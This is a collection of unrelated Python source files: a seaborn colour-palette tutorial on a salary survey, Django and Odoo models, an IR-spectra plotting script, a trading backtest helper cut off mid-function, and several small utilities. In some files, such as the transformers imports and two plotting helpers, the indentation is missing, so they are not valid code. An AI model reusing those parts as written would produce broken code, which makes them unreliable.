plt.xlabel("Profesión")
plt.title("Cantidad de encuestados según profesión")
plt.xticks(rotation=90)
plt.show()
# Podemos pensar el color como una dimensión más, que sentido tienen en esta visualización los colores? Está scrum master relacionado con developer por tener colores parecidos?
plt.figure(dpi=125)
# A single colour avoids implying relationships between professions.
sns.countplot(
    x="Trabajo de",
    data=df,
    order=df["Trabajo de"].value_counts().iloc[:20].index,
    color=(0.23, 0.72, 0.41),
)
plt.ylabel("Cantidad")
plt.xlabel("Profesión")
plt.title("Cantidad de encuestados según profesión")
plt.xticks(rotation=90)
plt.show()
# Teníamos el siguiente scatter plot
# +
df_submm = df[
    (df['Salario mensual NETO (en tu moneda local)'] < 5e5)
    & (df['Salario mensual BRUTO (en tu moneda local)'] < 5e5)
    & (df['Salario mensual BRUTO (en tu moneda local)'] > 1e4)
    & (df['Salario mensual NETO (en tu moneda local)'] > 1e4)
]
plt.figure(dpi=125)
# Default hue colours: no semantic ordering between satisfaction levels yet.
sns.scatterplot(
    x='Salario mensual NETO (en tu moneda local)',
    y='Salario mensual BRUTO (en tu moneda local)',
    hue=df_submm['¿Qué tan conforme estás con tu sueldo?'].tolist(),
    data=df_submm,
    alpha=0.7,
)
plt.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# Podemos cambiar los colores para dar a entender que una conformidad de 1 es "mala" y una conformidad de 4 es "buena"
# Preview the red→green palette and its reversed variant before using it below.
sns.color_palette("RdYlGn_r", 4)
sns.palplot(sns.color_palette("RdYlGn_r", 4))
sns.palplot(list(reversed(sns.color_palette("RdYlGn_r", 4))))
# +
df_submm = df[
    (df['Salario mensual NETO (en tu moneda local)'] < 5e5)
    & (df['Salario mensual BRUTO (en tu moneda local)'] < 5e5)
    & (df['Salario mensual BRUTO (en tu moneda local)'] > 1e4)
    & (df['Salario mensual NETO (en tu moneda local)'] > 1e4)
]
plt.figure(dpi=125)
# Reversed RdYlGn_r maps satisfaction 1 to red ("bad") and 4 to green ("good").
sns.scatterplot(
    x='Salario mensual NETO (en tu moneda local)',
    y='Salario mensual BRUTO (en tu moneda local)',
    hue=df_submm['¿Qué tan conforme estás con tu sueldo?'].tolist(),
    data=df_submm,
    alpha=0.7,
    palette=list(reversed(sns.color_palette("RdYlGn_r", 4))),
)
plt.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# ## Referencias
#
# - [Documentación de seaborn](http://seaborn.pydata.org/tutorial/color_palettes.html)
# - [Diverging Color Maps for Scientific Visualization - Kenneth Moreland](https://cfwebprod.sandia.gov/cfdocs/CompResearch/docs/ColorMapsExpanded.pdf)
# - [XKCD color survey](https://blog.xkcd.com/2010/05/03/color-survey-results/)
# - [Subtleties of colors series](https://earthobservatory.nasa.gov/blogs/elegantfigures/2013/08/05/subtleties-of-color-part-1-of-6/)
# - [Documentación de matplotlib](https://matplotlib.org/tutorials/colors/colormaps.html)
# # Pandas profiling
# +
# Build a full exploratory report of the dataframe; lazy=False computes it now.
from pandas_profiling import ProfileReport
report = ProfileReport(
    df, title='Encuesta de sueldos sysarmy 2020.02', explorative=True, lazy=False
)
# -
# Embed the generated report inside the notebook.
report.to_notebook_iframe()
|
# Formatted-output exercise: describe a person from a handful of variables.
name = 'Brandon M. Taylor'
age = 34
height = 69  # inches
height_cm = height * 2.54
weight = 220  # totally a lie
# Bug fix: reuse the weight variable instead of hard-coding 220 again,
# so changing `weight` keeps the kilogram conversion consistent.
weight_kg = weight * 0.45359237
eyes = 'Green'
teeth = 'White'
hair = "Brownish Red"
print(f"Let's talk about {name}.")
print(f"He's {height} inches tall.")
print(f"He's {height_cm} centimeters tall.")
print(f"He's {weight} pounds heavy.")
print(f"He's {weight_kg} kilograms heavy.")
print("Actually that's not too heavy.")
print(f"He's got {eyes} eyes and {hair} hair.")
print(f"His teeth are usually {teeth} depending on the candy.")
# this line is tricky, try to get it exactly right
total = age + height + weight
print(f"If I add {age}, {weight}, and {height} I get {total}.")
from base64 import b64encode, b64decode
from gzip import compress, decompress
from json import dumps, loads
from uuid import uuid4, UUID
def is_valid_uuid(uuid_to_test: str, version: int = 4) -> bool:
    """Return True iff *uuid_to_test* is the canonical string form of a
    UUID of the given *version*."""
    try:
        canonical = str(UUID(uuid_to_test, version=version))
    except ValueError:
        return False
    # UUID() accepts braces, urn: prefixes and mixed case, and forces the
    # version bits; comparing the canonical form back rejects all of those.
    return canonical == uuid_to_test
def encode_to_bytes(data: object, str_encoding: str = 'utf-8') -> bytes:
    """Serialize *data* to JSON, gzip-compress it and return it base64-encoded.

    Args:
        data: any JSON-serializable object.
        str_encoding: encoding used for the intermediate JSON string.

    Raises:
        Exception: wrapping any underlying failure; the original exception is
            chained via ``__cause__`` (bug fix: it was previously discarded).
    """
    try:
        data_str = dumps(data)
        data_bytes = bytes(data_str, str_encoding)
        compressed = compress(data_bytes)
        encoded = b64encode(compressed)
        return encoded
    except Exception as error:
        raise Exception('failed to compress data: {}'.format(error.args)) from error
def decode_from_bytes(data: bytes, str_encoding: str = 'utf-8') -> object:
    """Inverse of encode_to_bytes: base64-decode, gunzip and JSON-parse *data*.

    Raises:
        Exception: wrapping any underlying failure; the original exception is
            chained via ``__cause__`` (bug fix: it was previously discarded).
    """
    try:
        decoded = b64decode(data)
        decompressed = decompress(decoded)
        data_str = decompressed.decode(str_encoding)
        return loads(data_str)
    except Exception as error:
        raise Exception('failed to decompress data: {}'.format(error.args)) from error
|
import logging
# Configurations
from .configuration_bert import BERT_PRETRAINED_CONFIG_ARCHIVE_MAP, BertConfig
from .configuration_utils import PretrainedConfig
# Files and general utilities
from .file_utils import (
CONFIG_NAME,
MODEL_CARD_NAME,
PYTORCH_PRETRAINED_BERT_CACHE,
PYTORCH_TRANSFORMERS_CACHE,
TF2_WEIGHTS_NAME,
TF_WEIGHTS_NAME,
TRANSFORMERS_CACHE,
WEIGHTS_NAME,
add_end_docstrings,
add_start_docstrings,
cached_path,
is_tf_available,
is_torch_available,
is_torch_tpu_available,
)
# Tokenizers
from .tokenization_bert import BasicTokenizer, BertTokenizer, BertTokenizerFast, WordpieceTokenizer
from .tokenization_utils import PreTrainedTokenizer
from .tokenization_utils_base import (
BatchEncoding,
CharSpan,
PreTrainedTokenizerBase,
SpecialTokensMixin,
TensorType,
TokenSpan,
)
from .tokenization_utils_fast import PreTrainedTokenizerFast
# Modeling
if is_torch_available():
from .modeling_utils import PreTrainedModel, prune_layer, Conv1D, top_k_top_p_filtering, apply_chunking_to_forward
from .modeling_bert import (
BertPreTrainedModel,
BertModel,
BertForPreTraining,
BertForMaskedLM,
BertLMHeadModel,
BertForNextSentencePrediction,
BertForSequenceClassification,
BertForMultipleChoice,
BertForTokenClassification,
BertForQuestionAnswering,
load_tf_weights_in_bert,
BERT_PRETRAINED_MODEL_ARCHIVE_LIST,
BertLayer,
)
logger = logging.getLogger(__name__)

if not is_tf_available() and not is_torch_available():
    # Bug fix: the adjacent string literals were concatenated without
    # separating spaces, producing "found.Models" and "configurationand".
    logger.warning(
        "Neither PyTorch nor TensorFlow >= 2.0 have been found. "
        "Models won't be available and only tokenizers, configuration "
        "and file/data utilities can be used."
    )
|
#! /usr/bin/python2.7
# -*- coding: utf-8 -*-
from math import sqrt
from sys import float_info as fi
def heron(a, b, c):
    """Compute the area of a triangle from its side lengths via Heron's formula.

    Raises:
        ValueError: if any side is non-positive (below machine epsilon) or the
            sides violate the triangle inequality.
    """
    # Bug fix: both ValueError exceptions were raised without any message,
    # making failures indistinguishable to callers and logs.
    if a < fi.epsilon or b < fi.epsilon or c < fi.epsilon:
        raise ValueError("all sides must be positive")
    # NOTE(review): `<` (not `<=`) deliberately still accepts degenerate
    # triangles with a + b == c, which yield area 0 — confirm this is intended.
    if a + b < c or a + c < b or b + c < a:
        raise ValueError("sides violate the triangle inequality")
    return sqrt((a + b + c) * (a + b - c) * (a - b + c) * (-a + b + c)) / 4
print "Area of triangle a=4,b=5,c=6: " + str(heron(4, 5, 6))
|
from django.db import models
class kvmtag(models.Model):
    """Inventory record for a physical KVM host machine."""
    hostname = models.CharField(max_length=20)
    # NOTE(review): IPAddressField is deprecated (removed in Django 1.9) in
    # favour of GenericIPAddressField, and it does not take max_length —
    # confirm the Django version before changing these fields (migration needed).
    ip = models.IPAddressField(max_length=50)
    ip1 = models.IPAddressField(max_length=50)
    ip2 = models.IPAddressField(max_length=50)
    location = models.CharField(max_length=50)
    osversion = models.CharField(max_length=20)
    memory = models.CharField(max_length=20)
    disk = models.CharField(max_length=20)
    model_name = models.CharField(max_length=50)
    cpu_core = models.CharField(max_length=20)
    sorts = models.CharField(max_length=20)
    salt_status = models.CharField(max_length=20)
    # auto_now=True: updated on every save, not only on creation.
    create_time = models.DateTimeField(auto_now=True)
    def __unicode__(self):
        """Display the host by its hostname (Python 2 admin/listing repr)."""
        return self.hostname
class kvm_list(models.Model):
    """A virtual machine (cloud instance) hosted on a KVM host."""
    cloud_name = models.CharField(max_length=40)
    hostname = models.CharField(max_length=20)
    ip = models.IPAddressField(max_length=50)
    vir_disk = models.CharField(max_length=20)
    # Hostname of the physical machine carrying this VM.
    main_host = models.CharField(max_length=20)
    location = models.CharField(max_length=50)
    mac = models.CharField(max_length=50)
    kvm_location = models.CharField(max_length=40)
    create_time = models.DateTimeField(auto_now_add=True)
    # NOTE(review): default 'Unkown' is misspelled ("Unknown"); fixing it
    # requires a migration and an update of any code comparing this value.
    host_status = models.CharField(max_length=10,default='Unkown')
    projects_name = models.CharField(max_length=50)
    mirror_name = models.CharField(max_length=50)
    secret_name = models.CharField(max_length=50)
    def __unicode__(self):
        """Display the VM by its cloud name."""
        return self.cloud_name
    class Meta:
        # Newest VMs first in default querysets.
        ordering = ['-create_time']
class mirrorname(models.Model):
    """A mirror image name organised in a small parent/child hierarchy."""
    mirror_name = models.CharField(max_length=50)
    # NOTE(review): max_length has no effect on IntegerField (Django ignores
    # it / raises a check warning) — confirm and drop it in a future migration.
    level = models.IntegerField(max_length=2)
    parent = models.IntegerField(max_length=2)
    def __unicode__(self):
        return self.mirror_name
    class Meta:
        db_table = 'mirrorname'
class secret_key(models.Model):
    """An SSH/cloud secret key registered for a project."""
    secretkey_name = models.CharField(max_length=20)
    create_person = models.CharField(max_length=20)
    create_time = models.DateTimeField(auto_now_add=True)
    projects_name = models.CharField(max_length=30)
    def __unicode__(self):
        return self.secretkey_name
    class Meta:
        db_table = 'secretkey'
class zcloud_size(models.Model):
    """An available cloud instance size (flavor) option."""
    size = models.CharField(max_length=20)
    create_time = models.DateField(auto_now_add=True)
    def __unicode__(self):
        return self.size
    class Meta:
        db_table = 'zcloud_size'
class mirror_size(models.Model):
    """Size snapshot of a mirror image: one row per (name, size, day)."""
    name = models.CharField(max_length=30)
    size = models.CharField(max_length=20)
    create_time = models.DateField(auto_now_add=True)
    def __unicode__(self):
        # Bug fix: the original mixed %-style placeholders with str.format()
        # (u'%s %s %s'.format(...)), which returned the literal '%s %s %s'
        # regardless of the field values.
        return u'%s %s %s' % (self.name, self.size, self.create_time)
    class Meta:
        db_table = 'mirror_size'
|
# -*- coding: utf-8 -*-
#################################################################################
#
# Odoo, Open Source Management Solution
# Copyright (C) 2018-today Ascetic Business Solution <www.asceticbs.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#################################################################################
from odoo import api, fields, models, _
## inherit class 'hr.employee' to get details of employee and set rank according to assigned Tasks to salesperson
class Employee(models.Model):
    """Extend hr.employee: rank employees by how many of their assigned
    project tasks reached the 'Done' stage (rank 1 = most tasks done)."""
    _inherit = "hr.employee"
    # Computed, non-stored rank; recomputed each time the field is read.
    number_task_rank = fields.Integer(string="Rank", compute='task_rank')
    def task_rank(self):
        """Compute number_task_rank for every employee in the recordset.

        NOTE(review): employees without a linked user never enter
        employee_rank_list, so their rank stays at the integer default 0;
        tied task counts still receive distinct consecutive ranks (order
        among ties is unspecified); and one project.task search is issued
        per employee — confirm this scales for large recordsets.
        """
        employee_rank_list = []
        for employee in self:
            if employee.user_id:
                tasks_list = []
                # All tasks assigned to this employee's user, any stage.
                task_ids = self.env['project.task'].search([('user_id','=',employee.user_id.id)])
                for task in task_ids:
                    if task.stage_id.name == 'Done':
                        tasks_list.append(task)
                employee_dict = { 'employee' : employee , 'length' : len(tasks_list)}
                employee_rank_list.append(employee_dict)
        ## sorted dictionary to get rank of employee
        newlist = sorted(employee_rank_list, key=lambda k: k['length'], reverse=True)
        rank = 0
        for line in newlist:
            if line:
                rank = rank + 1
                # Write the computed rank onto the employee record.
                line['employee'].update({'number_task_rank' : rank})
|
import pytest
# Expose pytest's `pytester`/`testdir` fixtures to this test suite.
pytest_plugins = "pytester"
# See https://github.com/spulec/moto/issues/3292#issuecomment-770682026
@pytest.fixture(autouse=True)
def set_aws_region(monkeypatch):
    """Pin AWS_DEFAULT_REGION for every test (autouse) so boto3/moto never
    fail with a missing-region error; monkeypatch restores it afterwards."""
    monkeypatch.setenv("AWS_DEFAULT_REGION", "us-east-1")
|
#!/usr/bin/env python3
# vim:tabstop=4:softtabstop=4:shiftwidth=4
import sys
from argparse import ArgumentParser
from argparse import FileType
from argparse import Action
import argparse
from plot_functions import *
from matplotlib import pyplot as plt
from matplotlib import rc
from matplotlib import widgets
import matplotlib.image as image
import re
# Render all text through LaTeX (labels below use raw TeX strings).
rc('text', usetex=True)
# Some tweaks
# Top margin (subplots_adjust `top`) keyed by the number of legend labels,
# as a string: more labels need more headroom above the axes.
topValueForNumberOfLabels={ "0": 1.0,
"1": 0.94,
"2": 0.89,
"3" : 0.85,
"4" : 0.8 }
class AppendRange(Action):
    """argparse action parsing 'A-B' range strings into (float, float) tuples
    and appending them to the destination across repeated option uses."""

    def __init__(self, option_strings, dest, nargs='*', **kwargs):
        super(AppendRange, self).__init__(option_strings, dest, nargs, **kwargs)

    def __call__(self, parser, namespace, values, option_string=None):
        rangeList = []
        # Bug fix: the old pattern `\d+\.?\d+` required at least two digits
        # per bound, rejecting single-digit ranges such as "5-9".
        rangeRegex = re.compile(r'([+\-]?\d+(?:\.\d+)?)-([+\-]?\d+(?:\.\d+)?)')
        itValues = values
        # Values may arrive pre-wrapped in a list (nargs + type interplay).
        if any(isinstance(el, list) for el in values):
            itValues = values[0]
        for value in itValues:
            result = rangeRegex.search(value)
            if result:
                rangeList.append((float(result.group(1)), float(result.group(2))))
            else:
                raise ValueError("You did not specify a valid range")
        # Append to whatever is already stored so the option is repeatable.
        items = getattr(namespace, self.dest, None)
        if items is None:
            items = []
        for item in rangeList:
            items.append(item)
        setattr(namespace, self.dest, items)
def RangesY(value):
    """argparse type: split a string into exactly two whitespace-separated tokens.

    Raises:
        argparse.ArgumentTypeError: if the token count differs from two.
            (Bug fix: the old `raise argparse.ArgumentError()` itself failed
            with a TypeError because ArgumentError requires two arguments;
            ArgumentTypeError is the supported error for type callables.)
    """
    values = value.split()
    if len(values) != 2:
        raise argparse.ArgumentTypeError(
            'expected exactly two values, got {!r}'.format(value))
    return values
def Ranges(value):
    """argparse type: split a string on whitespace into a list of tokens."""
    return value.split()
def str2bool(v):
    """Parse common textual boolean spellings; booleans pass through unchanged.

    Raises:
        argparse.ArgumentTypeError: for any unrecognised spelling.
    """
    if isinstance(v, bool):
        return v
    lowered = v.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('Boolean value expected.')
def ListOfFloats(v):
    """argparse type: parse a whitespace-separated float list.

    The markers '-', 'nan', 'none' and 'notfound' (case-insensitive) become
    None. A sequence that already contains floats is returned unchanged.
    """
    if any(isinstance(el, float) for el in v):
        return v
    missing_markers = ('-', 'nan', 'none', 'notfound')
    return [
        None if token.lower() in missing_markers else float(token)
        for token in v.split()
    ]
def _generateParser():
    """Build the ArgumentParser for the IR spectra plotting tool.

    Three argument groups: global plot options, per-spectrum options
    (repeatable, one value per spectrum) and the input/output files.

    Bug fixes: several copy-pasted help strings were wrong — --majorTicksX
    said "minor ticks", and --interactive / --plotLimitsY described the
    x-axis range option.
    """
    parser=ArgumentParser(description='Plot an IR spectra.')
    plotOptionGroup=parser.add_argument_group(title='Plot Options',
            description='Options that affect the whole plot')
    spectraOptionGroup=parser.add_argument_group(
            title='Options that affect the each spectrum',
            description="""These options will influence the settings for each graph.
            If not mentioned explicitly each option can be specified multiple times
            for each spectrum""")
    fileOptionGroup=parser.add_argument_group(title='Spectra and Output File',
            description="Specifiy as many spectra. The last argument is the output figure")
    fileOptionGroup.add_argument('spectraDataFiles',nargs='+',type=FileType('r'),
            action='store')
    fileOptionGroup.add_argument('outputFile',nargs=1,type=FileType('w+'))
    # NOTE(review): default=0.03 (a float) combined with action="append" looks
    # fragile — confirm argparse handles a non-list default here as intended.
    plotOptionGroup.add_argument('--distanceSubplots',type=float,nargs='*',
            default=0.03,action="append",
            help="The padding between the axis breaks.")
    plotOptionGroup.add_argument('--labelXAxis',type=str,nargs=1,
            action="store",
            default=r"wavenumber [cm$^{-1}$]",
            help="The label for the X Axis")
    plotOptionGroup.add_argument('--labelYAxis',type=str,nargs=2,
            default=[r'absorption [arb. units]',r'intensity [km\ mol$^{-1}$]'],
            action="append",
            help="The label for the Y Axis")
    plotOptionGroup.add_argument('--majorTicksX',type=float,nargs='*',
            action="store",
            help="Set the major ticks on the x axis.")
    plotOptionGroup.add_argument('--minorTicksX',type=float,nargs='*',
            action="store",
            help="Set the minor ticks on the x axis.")
    plotOptionGroup.add_argument('--plotLimitsX',nargs=1,
            action=AppendRange,type=Ranges,
            help="Set the range of the x axis by specifying the range (e.g. 4000-2000)")
    plotOptionGroup.add_argument('--interactive',
            action="store_true",
            help="Show interactive sliders to adjust the y axis limits.")
    plotOptionGroup.add_argument('--plotLimitsY',nargs=1,
            action=AppendRange,type=RangesY,
            help="Set the range of the y axis by specifying the range (e.g. 0-100)")
    plotOptionGroup.add_argument('--image', nargs=1,
            type=FileType('r'),action='store',help="Show image in plot")
    plotOptionGroup.add_argument('--imagePosition',type=float,nargs=4,
            action="store", default=[0.0,0.0,0.2,0.2],
            help="4 floats: left,bottom,width,height. Starting from north west.")
    spectraOptionGroup.add_argument('--colors',nargs='*',
            action='store',
            help="Set the color for each plot",default="k")
    spectraOptionGroup.add_argument('--labels',nargs='*',
            action='store',
            help='The labels for each plot')
    spectraOptionGroup.add_argument('--assignments',nargs='*',
            type=ListOfFloats,action='store',
            help='If specified for two graphs assignment lines are drawn')
    spectraOptionGroup.add_argument('--invert',action="store",
            default="false",nargs='*',type=str2bool,
            help="Specify if plot should be inverted")
    spectraOptionGroup.add_argument('--yshift',type=float,
            nargs='*',action="store",default=0.0,
            help="Shift the data along the y axis")
    spectraOptionGroup.add_argument('--peakWidth',type=float,
            nargs='*',action="store",default=5.0,
            help="The width of the peaks for assignment.")
    spectraOptionGroup.add_argument('--yaxisIndex', type=int,
            nargs='*', action="store",default=0,choices=[0,1],
            help="Select the y axis on which to plot.")
    return parser
def _getValueForPlotOptionAtPosition(option,position):
if not isinstance(option,list):
return option
if len(option) < position:
print("Warning: option for index {} could not be found!".format(position))
return option[0]
else:
return option[position]
def _compileSpectraOptionsFromOptions(parsedOptions, file, index):
    """Assemble the keyword arguments for plotting spectrum number *index*
    read from *file*.

    Options missing an entry for *index* fall back to their first (default)
    value via _getValueForPlotOptionAtPosition.
    """
    pick = _getValueForPlotOptionAtPosition
    return {
        "filenames": (file,),
        "colors": (pick(parsedOptions.colors, index),),
        "labels": (pick(parsedOptions.labels, index),),
        "assignments": (pick(parsedOptions.assignments, index),),
        # invert is consumed as a plain bool, not a tuple.
        "invert": pick(parsedOptions.invert, index),
        "yshift": (pick(parsedOptions.yshift, index),),
        "peakWidth": pick(parsedOptions.peakWidth, index),
    }
def _compilePlotOptions(parsedOptions):
plotOptions={}
plotOptions["distanceBetweenPlots"]=parsedOptions.distanceSubplots
plotOptions["labelsXAxis"]=(parsedOptions.labelXAxis,)
plotOptions["labelsYAxis"]=parsedOptions.labelYAxis
plotOptions["majorTicksX"]=parsedOptions.majorTicksX
plotOptions["minorTicksX"]=parsedOptions.minorTicksX
plotOptions["plotLimitsX"]=parsedOptions.plotLimitsX
plotOptions["plotLimitsY"]=parsedOptions.plotLimitsY
return plotOptions
def main():
    """Parse CLI arguments, plot all spectra (optionally with axis breaks,
    band-assignment lines, an inset image and interactive y-axis sliders)
    and save the figure to the requested output file."""
    parser=_generateParser()
    arguments=parser.parse_args()
    plotOptions=_compilePlotOptions(arguments)
    # The number of axis interruptions is determined by length of plotLimitsX
    numberOfSubplots=1
    if plotOptions["plotLimitsX"]:
        numberOfSubplots=len(plotOptions["plotLimitsX"])
    figure,axes=setupPlot(numberOfSubplots,plt,**plotOptions,tight=False)
    plt.subplots_adjust(bottom=0.1,left=0.2)
    plots=[]
    assignmentPoints=[]
    # Draw every spectrum on the y axis (0 or 1) selected for its index.
    for index,file in enumerate(arguments.spectraDataFiles):
        spectraOption=_compileSpectraOptionsFromOptions(arguments,file,index)
        # yaxisIndex may be a scalar (same axis for all) or one entry per file.
        if type(arguments.yaxisIndex) == list:
            yaxes=axes[arguments.yaxisIndex[index]]
        else:
            yaxes=axes[arguments.yaxisIndex]
        theplot,assignmentPoint=plot(**spectraOption,figure=figure,
                axes=yaxes)
        plots.append(theplot[0])
        assignmentPoints.append(assignmentPoint)
    # By default we merge the last groups as they are computational bands
    if assignmentPoints:
        # First spectrum holds the experimental bands; all later ones are
        # concatenated as computed bands and connected to them.
        experimentalBands=assignmentPoints[0]
        computedBands=[]
        for bands in assignmentPoints[1:]:
            computedBands+=bands
        if len(experimentalBands) != len(computedBands):
            print("Warning: Experimental and computation band length do not match")
        drawAssignments(experimentalBands,computedBands,axes[1])
    if arguments.interactive:
        # Reserve space below the axes for the three sliders.
        plt.subplots_adjust(bottom=0.25,left=0.2)
        axes[0][0].margins(x=1.0)
        axisY1Slider=figure.add_axes([0.15,0.15,0.65,0.03])
        axisY2MaxSlider=figure.add_axes([0.15,0.19,0.30,0.03])
        axisY2MinSlider=figure.add_axes([0.6,0.19,0.30,0.03])
        y2Min,y2Max=axes[1][0].get_ylim()
        # Allow the y2 limits to be moved by +/-20% around their current values.
        margin=0.2
        y2MinUpper=y2Min+abs(y2Min*margin)
        y2MinLower=y2Min-abs(y2Min*margin)
        y2MaxUpper=y2Max+abs(y2Max*margin)
        y2MaxLower=y2Max-abs(y2Max*margin)
        step=int(y2Min/100)
        y1slider=widgets.Slider(ax=axisY1Slider,label="Y1 Margin",
                valmin=-0.5,valmax=5.0,valinit=1.0,
                valstep=0.01,orientation='horizontal')
        y2MaxSlider=widgets.Slider(ax=axisY2MaxSlider,label="Y2 Max",
                valmin=y2MaxLower,valmax=y2MaxUpper,valinit=y2Max,
                valstep=step,orientation='horizontal')
        y2MinSlider=widgets.Slider(ax=axisY2MinSlider,label="Y2 Min",
                valmin=y2MinLower,valmax=y2MinUpper,valinit=y2Min,
                valstep=step,orientation='horizontal')
        def updateY1(val):
            # Slider callback: scale the margins of every first-row axis.
            maxY = y1slider.val
            for axis in axes[0]:
                axis.margins(y=maxY)
            figure.canvas.draw_idle()
        def updateY2(val):
            # Slider callback: set explicit limits on every second-row axis.
            maxY = y2MaxSlider.val
            minY = y2MinSlider.val
            for axis in axes[1]:
                axis.set_ylim((minY,maxY))
            figure.canvas.draw_idle()
        y1slider.on_changed(updateY1)
        y2MaxSlider.on_changed(updateY2)
        y2MinSlider.on_changed(updateY2)
    labels= [ l.get_label() for l in plots ]
    # Insert Picture
    if arguments.image:
        insetPictureArray=image.imread(arguments.image[0].name)
        newax=figure.add_axes(arguments.imagePosition,anchor='NW',zorder=5)
        newax.imshow(insetPictureArray)
        newax.axis('Off')
    plt.figlegend(plots,labels,frameon=False,loc="upper right")
    # Top margin depends on how many legend labels must fit (see lookup table).
    plt.subplots_adjust(bottom=0.1,
            top=topValueForNumberOfLabels[str(len(labels))],
            left=0.12,
            right=0.88,
            wspace=0.05)
    #plt.show()
    figure.savefig(arguments.outputFile[0].name,dpi=1200)
if __name__ == "__main__":
    main()
|
import pandas as pd
import random as rd
import matplotlib.pyplot as plt
from sqlalchemy import create_engine
import datetime
import time
from learning_settings import Settings
def read_sql_merged(ai_settings):
    """Fetch every row of the configured table from the 'merged' database."""
    print("Enter Mysql")
    engine = create_engine(ai_settings.sql_path_merged)
    query = "select * from " + ai_settings.fetch_table
    frame = pd.read_sql(sql=query, con=engine)
    print("Out Mysql")
    return frame
def read_sql_wang2(ai_settings):
    """Fetch every row of the configured table from the 'wang2' database."""
    print("Enter Mysql")
    engine = create_engine(ai_settings.sql_path_wang2)
    query = "select * from " + ai_settings.fetch_table
    frame = pd.read_sql(sql=query, con=engine)
    print("Out Mysql")
    return frame
def read_sql_backtesting(ai_settings):
    """Fetch every row of the configured table from the backtesting database."""
    print("Enter Mysql")
    engine = create_engine(ai_settings.sql_path_backtesting)
    query = "select * from " + ai_settings.fetch_table
    frame = pd.read_sql(sql=query, con=engine)
    print("Out Mysql")
    return frame
def read_file(ai_settings):
    """Read spreadsheet data from the path configured on *ai_settings*.

    Bug fix: the passed-in settings object was immediately shadowed by a
    freshly constructed Settings(), silently ignoring the caller's
    configuration; the parameter is now actually used.
    """
    loads = pd.read_excel(ai_settings.file_path)
    return loads
def compute_ma(data, cycle):
    """Compute a trailing moving average of *data* with window length *cycle*.

    Element i (for i >= cycle) is the mean of the *cycle* values strictly
    before it, i.e. data[i-cycle:i]. The first *cycle* positions have no full
    window and are seeded with data[0].
    """
    # Seed with data[0] directly instead of the old list(range(len(data)))
    # placeholder, whose index values were meaningless (and which raised
    # IndexError during seeding whenever cycle exceeded len(data)).
    ma_cycle = [data[0]] * len(data)
    for i in range(cycle, len(data)):
        ma_cycle[i] = sum(data[i - cycle:i]) / cycle
    return ma_cycle
def compute_easy_net(data, direction, result_show):
    """Compute the strategy net-value curve implied by a direction series.

    data: price series; direction: per-bar position (1 long, -1 short, 0 flat).
    Side effects on result_show: open/close bookkeeping, trade_times,
    trade_succeed, max_profit, max_loss, max_retracement and std.
    Returns the net-value list (starting at 1).

    Fix: the two max-loss checks for short positions previously computed
    (open / close) / open instead of the loss ratio (open - close) / open.
    """
    print("compute easy net value...")
    net_value = [1] * len(data)
    max_value = 0
    trade_times = 0
    trade_succeed = 0
    # initiate max retracement
    result_show.max_retracement = 0
    for i in range(1, len(data)):
        # compute trade success times for success rate
        if direction[i - 1] == 0 and direction[i] == 1:
            # flat -> long: open a new position
            result_show.open = data[i]
            result_show.ifstop = 0
            trade_times += 1
        elif direction[i - 1] == 0 and direction[i] == -1:
            # flat -> short: open a new position
            result_show.open = data[i]
            result_show.ifstop = 0
            trade_times += 1
        elif direction[i - 1] == 1 and direction[i] == 0:
            # long -> flat: close a long; profit when close > open
            result_show.close = data[i]
            if result_show.close > result_show.open:
                trade_succeed += 1
            if (result_show.close - result_show.open) / result_show.open \
                    > result_show.max_profit:
                result_show.max_profit = \
                    (result_show.close - result_show.open) / result_show.open
            if (result_show.close - result_show.open) / result_show.open \
                    < result_show.max_loss:
                result_show.max_loss = \
                    (result_show.close - result_show.open) / result_show.open
        elif direction[i - 1] == -1 and direction[i] == 0:
            # short -> flat: close a short; profit when close < open
            result_show.close = data[i]
            if result_show.close < result_show.open:
                trade_succeed += 1
            if (result_show.open - result_show.close) / result_show.open \
                    > result_show.max_profit:
                result_show.max_profit = \
                    (result_show.open - result_show.close) / result_show.open
            # BUGFIX: was (open / close) / open — not a loss ratio.
            if (result_show.open - result_show.close) / result_show.open \
                    < result_show.max_loss:
                result_show.max_loss = \
                    (result_show.open - result_show.close) / result_show.open
        elif direction[i - 1] == -1 and direction[i] == 1:
            # short -> long: settle the short, then reopen long below
            result_show.close = data[i]
            if result_show.close < result_show.open:
                trade_succeed += 1
            if (result_show.open - result_show.close) / result_show.open \
                    > result_show.max_profit:
                result_show.max_profit = \
                    (result_show.open - result_show.close) / result_show.open
            # BUGFIX: was (open / close) / open — not a loss ratio.
            if (result_show.open - result_show.close) / result_show.open \
                    < result_show.max_loss:
                result_show.max_loss = \
                    (result_show.open - result_show.close) / result_show.open
            result_show.open = data[i]
            result_show.ifstop = 0
            trade_times += 1
        elif direction[i - 1] == 1 and direction[i] == -1:
            # long -> short: settle the long, then reopen short below
            result_show.close = data[i]
            if result_show.close > result_show.open:
                trade_succeed += 1
            if (result_show.close - result_show.open) / result_show.open \
                    > result_show.max_profit:
                result_show.max_profit = \
                    (result_show.close - result_show.open) / result_show.open
            if (result_show.close - result_show.open) / result_show.open \
                    < result_show.max_loss:
                result_show.max_loss = \
                    (result_show.close - result_show.open) / result_show.open
            result_show.open = data[i]
            result_show.ifstop = 0
            trade_times += 1
        # compute easy net value from the position held over the last bar
        if direction[i - 1] == 1:
            net_value[i] = net_value[i - 1] * ((data[i] - data[i - 1]) / data[i - 1] + 1)
        elif direction[i - 1] == -1:
            net_value[i] = net_value[i - 1] * ((data[i - 1] - data[i]) / data[i - 1] + 1)
        else:
            net_value[i] = net_value[i - 1]
        # update max retracement (drawdown from the running peak)
        if net_value[i] > max_value:
            max_value = net_value[i]
        retracement = (max_value - net_value[i]) / max_value
